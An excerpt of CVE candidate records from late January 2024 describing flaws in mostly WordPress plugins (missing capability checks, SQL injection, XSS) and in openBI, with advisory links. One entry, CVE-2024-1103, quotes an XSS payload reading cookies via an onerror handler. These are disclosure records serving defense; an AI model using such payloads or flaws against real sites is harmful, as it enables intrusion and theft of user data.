CVE 2024 1133 Candidate The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of restricted Q&A content due to a missing capability check when interacting with questions in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with subscriber access or higher, to interact with questions in courses in which they are not enrolled including private courses. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve Assigned (20240131)
CVE 2024 1130 Candidate The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_read() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as read. MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve Assigned (20240131)
CVE 2024 1129 Candidate The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_starred() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as starred. MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve Assigned (20240131)
CVE 2024 1128 Candidate The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.6.0. This is due to insufficient sanitization of HTML input in the Q&A functionality. This makes it possible for authenticated attackers, with Student access and above, to inject arbitrary HTML onto a site, though it does not allow Cross-Site Scripting MISC:https://plugins.trac.wordpress.org/changeset/3037911/tutor/tags/2.6.1/classes/Q_and_A.php?old=2827221&old_path=tutor/trunk/classes/Q_and_A.php | URL:https://plugins.trac.wordpress.org/changeset/3037911/tutor/tags/2.6.1/classes/Q_and_A.php?old=2827221&old_path=tutor/trunk/classes/Q_and_A.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve Assigned (20240131)
CVE 2024 1127 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve all event booking which can contain PII. MISC:https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk//includes/service/class-ep-ajax.php#L1994 | URL:https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk//includes/service/class-ep-ajax.php#L1994 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/39da62be-e630-48cd-b732-80ed3d337638?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/39da62be-e630-48cd-b732-80ed3d337638?source=cve Assigned (20240131)
CVE 2024 1126 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to to retrieve the attendees list for any event. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve Assigned (20240131)
CVE 2024 1125 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the calendar_events_delete() function in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve Assigned (20240131)
CVE 2024 1124 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the ep_send_attendees_email() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send arbitrary emails with arbitrary content from the site. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve Assigned (20240131)
CVE 2024 1123 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_frontend_event_submission() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the title and content of arbitrary posts. This can also be exploited by unauthenticated attackers when the allow_submission_by_anonymous_user setting is enabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve Assigned (20240131)
CVE 2024 1122 Candidate The Event Manager, Events Calendar, Events Tickets for WooCommerce – Eventin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_data() function in all versions up to, and including, 3.3.50. This makes it possible for unauthenticated attackers to export event data. MISC:https://plugins.trac.wordpress.org/changeset/3033231/wp-event-solution/tags/3.3.51/core/admin/hooks.php | URL:https://plugins.trac.wordpress.org/changeset/3033231/wp-event-solution/tags/3.3.51/core/admin/hooks.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve Assigned (20240131)
CVE 2024 1121 Candidate The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve Assigned (20240131)
CVE 2024 1120 Candidate The NextMove Lite – Thank You Page for WooCommerce and Finale Lite – Sales Countdown Timer & Discount for WooCommerce plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the download_tools_settings() function in all versions up to, and including, 2.17.0. This makes it possible for unauthenticated attackers to export system information that can aid attackers in an attack. MISC:https://plugins.trac.wordpress.org/browser/finale-woocommerce-sales-countdown-timer-discount/trunk/includes/wcct-xl-support.php#L710 | URL:https://plugins.trac.wordpress.org/browser/finale-woocommerce-sales-countdown-timer-discount/trunk/includes/wcct-xl-support.php#L710 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve Assigned (20240131)
CVE 2024 1119 Candidate The Order Tip for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_tips_to_csv() function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to export the plugin's order fees. MISC:https://plugins.trac.wordpress.org/browser/order-tip-woo/trunk/admin/controllers/reports.class.php#L359 | URL:https://plugins.trac.wordpress.org/browser/order-tip-woo/trunk/admin/controllers/reports.class.php#L359 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve Assigned (20240131)
CVE 2024 1118 Candidate The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3 | URL:https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve Assigned (20240131)
CVE 2024 1117 Candidate A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475. MISC:https://note.zhaoj.in/share/Liu1nbjddxu4 | URL:https://note.zhaoj.in/share/Liu1nbjddxu4 | MISC:https://vuldb.com/?ctiid.252475 | URL:https://vuldb.com/?ctiid.252475 | MISC:https://vuldb.com/?id.252475 | URL:https://vuldb.com/?id.252475 Assigned (20240131)
CVE 2024 1116 Candidate A vulnerability was found in openBI up to 1.0.8. It has been classified as critical. Affected is the function index of the file /application/plugins/controller/Upload.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252474 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/uCElTQRGWVyw | URL:https://note.zhaoj.in/share/uCElTQRGWVyw | MISC:https://vuldb.com/?ctiid.252474 | URL:https://vuldb.com/?ctiid.252474 | MISC:https://vuldb.com/?id.252474 | URL:https://vuldb.com/?id.252474 Assigned (20240131)
CVE 2024 1115 Candidate A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function dlfile of the file /application/websocket/controller/Setting.php. The manipulation of the argument phpPath leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252473 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/81JmiyogcYL7 | URL:https://note.zhaoj.in/share/81JmiyogcYL7 | MISC:https://vuldb.com/?ctiid.252473 | URL:https://vuldb.com/?ctiid.252473 | MISC:https://vuldb.com/?id.252473 | URL:https://vuldb.com/?id.252473 Assigned (20240131)
CVE 2024 1114 Candidate A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function dlfile of the file /application/index/controller/Screen.php. The manipulation of the argument fileUrl leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252472. MISC:https://note.zhaoj.in/share/9wv48TygKRxo | URL:https://note.zhaoj.in/share/9wv48TygKRxo | MISC:https://vuldb.com/?ctiid.252472 | URL:https://vuldb.com/?ctiid.252472 | MISC:https://vuldb.com/?id.252472 | URL:https://vuldb.com/?id.252472 Assigned (20240131)
CVE 2024 1113 Candidate A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471. MISC:https://note.zhaoj.in/share/hPSx8li8LFfJ | URL:https://note.zhaoj.in/share/hPSx8li8LFfJ | MISC:https://vuldb.com/?ctiid.252471 | URL:https://vuldb.com/?ctiid.252471 | MISC:https://vuldb.com/?id.252471 | URL:https://vuldb.com/?id.252471 Assigned (20240131)
CVE 2024 1112 Candidate Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker Assigned (20240131)
CVE 2024 1111 Candidate A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Login System 1.0. Affected by this issue is some unknown functionality of the file add-user.php. The manipulation of the argument qr-code leads to cross site scripting. The attack may be launched remotely. VDB-252470 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252470 | URL:https://vuldb.com/?ctiid.252470 | MISC:https://vuldb.com/?id.252470 | URL:https://vuldb.com/?id.252470 Assigned (20240131)
CVE 2024 1110 Candidate The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings. MISC:https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba | URL:https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve Assigned (20240131)
CVE 2024 1109 Candidate The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information. MISC:https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4 | URL:https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve Assigned (20240131)
CVE 2024 1108 Candidate The Plugin Groups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_init() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to change the settings of the plugin, which can also cause a denial of service due to a misconfiguration. MISC:https://plugins.trac.wordpress.org/changeset/3036754/plugin-groups/trunk/classes/class-plugin-groups.php | URL:https://plugins.trac.wordpress.org/changeset/3036754/plugin-groups/trunk/classes/class-plugin-groups.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve Assigned (20240131)
CVE 2024 1106 Candidate The Shariff Wrapper WordPress plugin before 4.6.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://wpscan.com/vulnerability/0672f8af-33e2-459c-ac8a-7351247a8a26/ | URL:https://wpscan.com/vulnerability/0672f8af-33e2-459c-ac8a-7351247a8a26/ Assigned (20240131)
CVE 2024 1104 Candidate An unauthenticated remote attacker can bypass the brute force prevention mechanism and disturb the webservice for all users. MISC:https://www.areal-topkapi.com/en/services/security-bulletins | URL:https://www.areal-topkapi.com/en/services/security-bulletins Assigned (20240131)
CVE 2024 1103 Candidate A vulnerability was found in CodeAstro Real Estate Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file profile.php of the component Feedback Form. The manipulation of the argument Your Feedback with the input <img src=x onerror=alert(document.cookie)> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252458 is the identifier assigned to this vulnerability. MISC:https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true | URL:https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true | MISC:https://vuldb.com/?ctiid.252458 | URL:https://vuldb.com/?ctiid.252458 | MISC:https://vuldb.com/?id.252458 | URL:https://vuldb.com/?id.252458 Assigned (20240131)
CVE 2024 1099 Candidate A vulnerability was found in Rebuild up to 3.5.5. It has been classified as problematic. Affected is the function getFileOfData of the file /filex/read-raw. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252456. MISC:https://vuldb.com/?ctiid.252456 | URL:https://vuldb.com/?ctiid.252456 | MISC:https://vuldb.com/?id.252456 | URL:https://vuldb.com/?id.252456 | MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx | URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx Assigned (20240131)
CVE 2024 1098 Candidate A vulnerability was found in Rebuild up to 3.5.5 and classified as problematic. This issue affects the function QiniuCloud.getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to information disclosure. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252455. MISC:https://vuldb.com/?ctiid.252455 | URL:https://vuldb.com/?ctiid.252455 | MISC:https://vuldb.com/?id.252455 | URL:https://vuldb.com/?id.252455 | MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls | URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls Assigned (20240131)
CVE 2024 1096 Candidate Twister Antivirus v8.17 is vulnerable to a Denial of Service vulnerability by triggering the 0x80112067, 0x801120CB 0x801120CC 0x80112044, 0x8011204B, 0x8011204F, 0x80112057, 0x8011205B, 0x8011205F, 0x80112063, 0x8011206F, 0x80112073, 0x80112077, 0x80112078, 0x8011207C and 0x80112080 IOCTL codes of the fildds.sys driver. MISC:http://www.filseclab.com/en-us/products/twister.htm | URL:http://www.filseclab.com/en-us/products/twister.htm | MISC:https://fluidattacks.com/advisories/holiday/ | URL:https://fluidattacks.com/advisories/holiday/ Assigned (20240131)
CVE 2024 1095 Candidate The Build & Control Block Patterns – Boost up Gutenberg Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the settings_export() function in all versions up to, and including, 1.3.5.4. This makes it possible for unauthenticated attackers to export the plugin's settings. MISC:https://plugins.trac.wordpress.org/browser/control-block-patterns/trunk/classes/Settings/SettingsPage.php#L166 | URL:https://plugins.trac.wordpress.org/browser/control-block-patterns/trunk/classes/Settings/SettingsPage.php#L166 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve Assigned (20240131)
CVE 2024 1093 Candidate The Change Memory Limit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_logic() function hooked via admin_init in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update the memory limit. MISC:https://plugins.trac.wordpress.org/browser/change-memory-limit/trunk/change-mem-limit.php#L104 | URL:https://plugins.trac.wordpress.org/browser/change-memory-limit/trunk/change-mem-limit.php#L104 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve Assigned (20240131)
CVE 2024 1092 Candidate The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve Assigned (20240130)
CVE 2024 1091 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reinitialize function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to remove all plugin data. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve Assigned (20240130)
